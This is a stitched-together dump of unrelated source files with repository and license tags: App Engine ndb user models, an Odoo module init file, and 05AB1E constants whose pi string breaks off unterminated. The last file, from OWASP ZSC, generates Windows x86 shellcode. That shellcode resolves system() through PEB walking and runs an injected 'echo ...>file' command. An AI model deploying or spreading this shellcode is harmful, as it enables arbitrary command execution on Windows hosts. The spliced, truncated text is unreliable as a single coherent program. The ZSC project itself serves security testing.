    ip = ndb.StringProperty()
    timestamp = ndb.StringProperty()


class LogEmail(ndb.Model):
    sender = ndb.StringProperty(required=True)
    to = ndb.StringProperty(required=True)
    subject = ndb.StringProperty(required=True)
    body = ndb.TextProperty()
    when = ndb.DateTimeProperty()


class SocialUser(ndb.Model):
    PROVIDERS_INFO = {
        # uri is for OpenID only (not OAuth)
        'google': {'name': 'google', 'label': 'Google', 'uri': 'gmail.com'},
        # 'github': {'name': 'github', 'label': 'Github', 'uri': ''},
        # 'facebook': {'name': 'facebook', 'label': 'Facebook', 'uri': ''},
        # 'linkedin': {'name': 'linkedin', 'label': 'LinkedIn', 'uri': ''},
        # 'myopenid': {'name': 'myopenid', 'label': 'MyOpenid', 'uri': 'myopenid.com'},
        # 'twitter': {'name': 'twitter', 'label': 'Twitter', 'uri': ''},
        # 'yahoo': {'name': 'yahoo', 'label': 'Yahoo!', 'uri': 'yahoo.com'},
    }

    user = ndb.KeyProperty(kind=User)
    provider = ndb.StringProperty()
    uid = ndb.StringProperty()
    extra_data = ndb.JsonProperty()

    @classmethod
    def get_by_user(cls, user):
        return cls.query(cls.user == user).fetch()

    @classmethod
    def get_by_user_and_provider(cls, user, provider):
        return cls.query(cls.user == user, cls.provider == provider).get()

    @classmethod
    def get_by_provider_and_uid(cls, provider, uid):
        return cls.query(cls.provider == provider, cls.uid == uid).get()

    @classmethod
    def check_unique_uid(cls, provider, uid):
        # pair (provider, uid) should be unique
        return cls.get_by_provider_and_uid(provider, uid) is None

    @classmethod
    def check_unique_user(cls, provider, user):
        # pair (user, provider) should be unique
        return cls.get_by_user_and_provider(user, provider) is None

    @classmethod
    def check_unique(cls, user, provider, uid):
        # pair (provider, uid) should be unique and pair (user, provider) should be unique
        return cls.check_unique_uid(provider, uid) and cls.check_unique_user(provider, user)

    @staticmethod
    def open_id_providers():
        return [k for k, v in SocialUser.PROVIDERS_INFO.items() if v['uri']]
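A sketch of how these models fit together when linking a social account: both uniqueness checks must pass before the SocialUser row is written (the email and uid values below are made up):

    user = User.get_by_email("alice@example.com")
    if user and SocialUser.check_unique(user.key, "google", "uid-123"):
        SocialUser(user=user.key, provider="google", uid="uid-123").put()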
sysadminmatmoz/odoo-clearcorp
TODO-8.0/cash_flow_report/__init__.py
Python
agpl-3.0
1,165
0.000858
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Addons modules by CLEARCORP S.A.
#    Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

import account_move_line
import account_move_reconcile
import cash_flow_type
import cash_flow_distribution
import report
import wizard
Emigna/05AB1E
lib/constants.py
Python
mit
146,313
0.000055
import datetime
import math


class MethodAttribute:
    """
    A method attribute is an attribute with the method and its corresponding
    arity attached as parameters. It simply acts as a tuple for easy access.
    """

    def __init__(self, method, arity):
        self.method = method
        self.arity = arity


constants = {
    "ža": MethodAttribute(lambda: int(datetime.datetime.now().hour), arity=0),
    "žb": MethodAttribute(lambda: int(datetime.datetime.now().minute), arity=0),
    "žc": MethodAttribute(lambda: int(datetime.datetime.now().second), arity=0),
    "žd": MethodAttribute(lambda: int(datetime.datetime.now().microsecond), arity=0),
    "že": MethodAttribute(lambda: int(datetime.datetime.now().day), arity=0),
    "žf": MethodAttribute(lambda: int(datetime.datetime.now().month), arity=0),
    "žg": MethodAttribute(lambda: int(datetime.datetime.now().year), arity=0),
    "žh": MethodAttribute(lambda: "0123456789", arity=0),
    "ži": MethodAttribute(lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", arity=0),
    "žj": MethodAttribute(lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", arity=0),
    "žk": MethodAttribute(lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA", arity=0),
    "žl": MethodAttribute(lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210_", arity=0),
    "žm": MethodAttribute(lambda: "9876543210", arity=0),
    "žn": MethodAttribute(lambda: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", arity=0),
    "žo": MethodAttribute(lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba", arity=0),
    "žp": MethodAttribute(lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBA", arity=0),
    "žq": MethodAttribute(lambda: math.pi, arity=0),
    "žr": MethodAttribute(lambda: math.e, arity=0),
    "žs": MethodAttribute(lambda x: constant_pi[0:int(x) + 2], arity=1),
    "žt": MethodAttribute(lambda x: constant_e[0:int(x) + 2], arity=1),
    "žu": MethodAttribute(lambda: "()<>[]{}", arity=0),
    "žv": MethodAttribute(lambda: 16, arity=0),
    "žw": MethodAttribute(lambda: 32, arity=0),
    "žx": MethodAttribute(lambda: 64, arity=0),
    "žy": MethodAttribute(lambda: 128, arity=0),
    "žz": MethodAttribute(lambda: 256, arity=0),
    "žA": MethodAttribute(lambda: 512, arity=0),
    "žB": MethodAttribute(lambda: 1024, arity=0),
    "žC": MethodAttribute(lambda: 2048, arity=0),
    "žD": MethodAttribute(lambda: 4096, arity=0),
    "žE": MethodAttribute(lambda: 8192, arity=0),
    "žF": MethodAttribute(lambda: 16384, arity=0),
    "žG": MethodAttribute(lambda: 32768, arity=0),
    "žH": MethodAttribute(lambda: 65536, arity=0),
    "žI": MethodAttribute(lambda: 2147483648, arity=0),
    "žJ": MethodAttribute(lambda: 4294967296, arity=0),
    "žK": MethodAttribute(lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", arity=0),
    "žL": MethodAttribute(lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210", arity=0),
    "žM": MethodAttribute(lambda: "aeiou", arity=0),
    "žN": MethodAttribute(lambda: "bcdfghjklmnpqrstvwxyz", arity=0),
    "žO": MethodAttribute(lambda: "aeiouy", arity=0),
    "žP": MethodAttribute(lambda: "bcdfghjklmnpqrstvwxz", arity=0),
    "žQ": MethodAttribute(lambda: " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~", arity=0),
    "žR": MethodAttribute(lambda: "ABC", arity=0),
    "žS": MethodAttribute(lambda: "qwertyuiop", arity=0),
    "žT": MethodAttribute(lambda: "asdfghjkl", arity=0),
    "žU": MethodAttribute(lambda: "zxcvbnm", arity=0),
    "žV": MethodAttribute(lambda: ["qwertyuiop", "asdfghjkl", "zxcvbnm"], arity=0),
    "žW": MethodAttribute(lambda: "qwertyuiopasdfghjklzxcvbnm", arity=0),
    "žX": MethodAttribute(lambda: "qwertyuiopasdfghjklzxcvbnm", arity=0),
    "т": MethodAttribute(lambda: 100, arity=0),
    "₁": MethodAttribute(lambda: 256, arity=0),
    "₂": MethodAttribute(lambda: 26, arity=0),
    "₃": MethodAttribute(lambda: 95, arity=0),
    "₄": MethodAttribute(lambda: 1000, arity=0)
}


class ConstantsInvoker:
    def __init__(self):
        self.commands_list = constants

    def invoke_command(self, command, *args):
        """
        Invokes the command passed through the argument and computes the
        desired result using the rest of the arguments as args for the method.

        :param command: A string representation of the 05AB1E command
        :param args: The arguments that will be passed on the method
        :return: Any variable, determined by the corresponding method
        """
        current_method = self.commands_list.get(command)
        result = current_method.method(*args)
        return result


constant_pi = "3.141592653589793238462643383279502884197169399375105820974944"\
              "92307816406286208998628034825342117067982148086513282306647093"\
              "44609550582231725359408128481117450284102701938521105559644622"\
              "48954930381964428810975665933446128475648233786783165271201909"\
              "45648566923460348610454326648213393607260249141273724587006606"\
              "15588174881520920962829254091715364367892590360011330530548820"\
              "66521384146951941511609433057270365759591953092186117381932611"\
              "93105118548074462379962749567351885752724891227938183011949129"\
              "33673362440656643086021394946395224737190702179860943702770539"\
              "17176293176752384674818467669405132000568127145263560827785771"\
              "42757789609173637178721468440901224953430146549585371050792279"\
              "89258923542019956112129021960864034418159813629774771309960518"\
              "07211349999998372978049951059731732816096318595024459455346908"\
              "02642522308253344685035261931188171010003137838752886587533208"\
              "81420617177669147303598253490428755468731159562863882353787593"\
              "51957781857780532171226806613001927876611195909216420198938095"\
              "57201065485863278865936153381827968230301952035301852968995773"\
              "22599413891249721775283479131515574857242454150695950829533116"\
              "61727855889075098381754637464939319255060400927701671139009848"\
              "24012858361603563707660104710181942955596198946767837449448255"\
              "79774726847104047534646208046684259069491293313677028989152104"\
              "52162056966024058038150193511253382430035587640247496473263914"\
              "99272604269922796782354781636009341721641219924586315030286182"\
              "74555706749838505494588586926995690927210797509302955321165344"\
              "87202755960236480665499119881834797753566369807426542527862551"\
              "18417574672890977772793800081647060016145249192173217214772350"\
              "41441973568548161361157352552133475741849468438523323907394143"\
              "34547762416862518983569485562099219222184272550254256887671790"\
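Usage of ConstantsInvoker follows directly from invoke_command's docstring; "žs" slices the constant_pi literal defined above:

    invoker = ConstantsInvoker()
    print(invoker.invoke_command("žq"))     # 3.141592653589793 (math.pi)
    print(invoker.invoke_command("žs", 3))  # "3.141"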
Ali-Razmjoo/OWASP-ZSC
lib/generator/windows_x86/create_file.py
Python
gpl-3.0
1,892
0.000529
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core import stack


def create_file(create_command):
    return '''
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
xor %esi,%esi
mov %edx,%esi
xor %ecx,%ecx
push %ecx
push $0x41797261
push $0x7262694c
push $0x64616f4c
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
mov $0x6c6c,%cx
push %ecx
push $0x642e7472
push $0x6376736d
push %esp
call *%eax
xor %edi,%edi
mov %eax,%edi
xor %edx,%edx
push %edx
mov $0x6d65,%dx
push %edx
push $0x74737973
mov %esp,%ecx
push %ecx
push %edi
xor %edx,%edx
mov %esi,%edx
call *%edx
xor %ecx,%ecx
{0}
push %esp
call *%eax
xor %edx,%edx
push %edx
push $0x74697865
mov %esp,%ecx
push %ecx
push %edi
call *%esi
xor %ecx,%ecx
push %ecx
call *%eax
'''.format(create_command)


def run(data):
    file_to_create = data[0]
    file_content = data[1]
    return create_file(stack.generate("echo " + file_content + ">" + file_to_create, "%ecx", "string"))
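run() expects a two-element list, the path of the file to create and its content, and returns GNU-as flavored x86 assembly with the stack-encoded echo command substituted for {0}. A hypothetical call, only runnable inside the OWASP-ZSC tree where core.stack is importable (path and content are made up):

    asm = run(["C:\\result.txt", "owned"])
    print(asm.splitlines()[1])  # first instruction: xor %ecx,%ecx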